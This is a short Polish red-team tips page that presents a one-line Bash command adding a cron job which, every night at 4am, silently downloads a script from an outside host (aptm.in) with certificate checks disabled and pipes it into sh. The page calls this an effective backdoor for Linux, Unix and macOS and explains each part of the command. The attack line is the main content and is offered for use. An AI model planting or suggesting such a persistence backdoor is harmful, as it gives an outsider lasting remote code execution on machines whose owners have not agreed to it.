alphasec
Bash / Unix protip 000a
in 𝕏

(crontab -l; echo '0 4 * * * curl -ksL aptm.in/czwarta|sh') | crontab - może być zupełnie skutecznym backdoorem na Linux/Unix/MacOS

tty1 · bash
$ (crontab -l; echo '0 4 * * * curl -ksL aptm.in/czwarta|sh') | crontab
#Bash#Backdoor#RedTeam#Unix

Ten oneliner doda do crona wpis, który spowoduje uruchomienie o czwartej nad ranem skryptu znajdującego się pod adresem aptm.in/czwarta, który pobierze aktualną datę i dopisze ją do pliku /tmp/czwarta_nad_ranem. Skrypt zostanie uruchomiony w kontekście użytkownika, który tego onelinera uruchomił. Istotne jest to, że poprzednie wpisy w cronie zostaną zachowane.

Rozbierając na kawałki:

Tak przygotowany backdoor domyślnie zadziałać powinien na wszstlkich systemach Linux/Unix, w tym na MacOS.

Jak to działa — krok po kroku

Rozłóżmy onelinera na czynniki pierwsze:

(crontab -l;

wyświetlenie aktualnych wpisów crona, by zostały zachowane,

echo '0 4 * * * curl -ksL aptm.in/czwarta|sh'

nowe zadanie crona, uruchomione o czwartej nad ranem; opcje dla curla:

  • -k (--insecure) - kontynuuj nawet jeśli będą problemy z certyfikatem SSL/TLS,
  • -s (--silent) - tryb cichy, bez paska postępu i komunikatów o błędach,
  • -L (--location - podążaj za przekierowaniami 30X,

) | crontab

wynik tych dwóch poleceń (dlatego umieszczone w nawiasach) przekieruj do polecenia crontab, co spowoduje ustawienie nowego wpisu w cronie (nadpisując poprzednie, ale to zaadresowaliśmy poprzez crontab -l).

Przydatne linki

https://crontab.guru/ wygodny pomocnik do definiowania harmonogramów crona, np. zobacz crontab.guru/#0_4_/10_1-6_ web ↗ https://youtu.be/vtopljs5FQw Czwarta nad ranem ;-) video ↗
← poprzedni protip 0009 ••• Wszystkie protipy następny → protip 000b
// subskrybuj

Nowe protipy prosto na maila.

Mięsiste jednolinijkowce i triki z prawdziwych zleceń. Zero spamu, zero teorii. Wypisujesz się jednym kliknięciem.

wersja newslettera: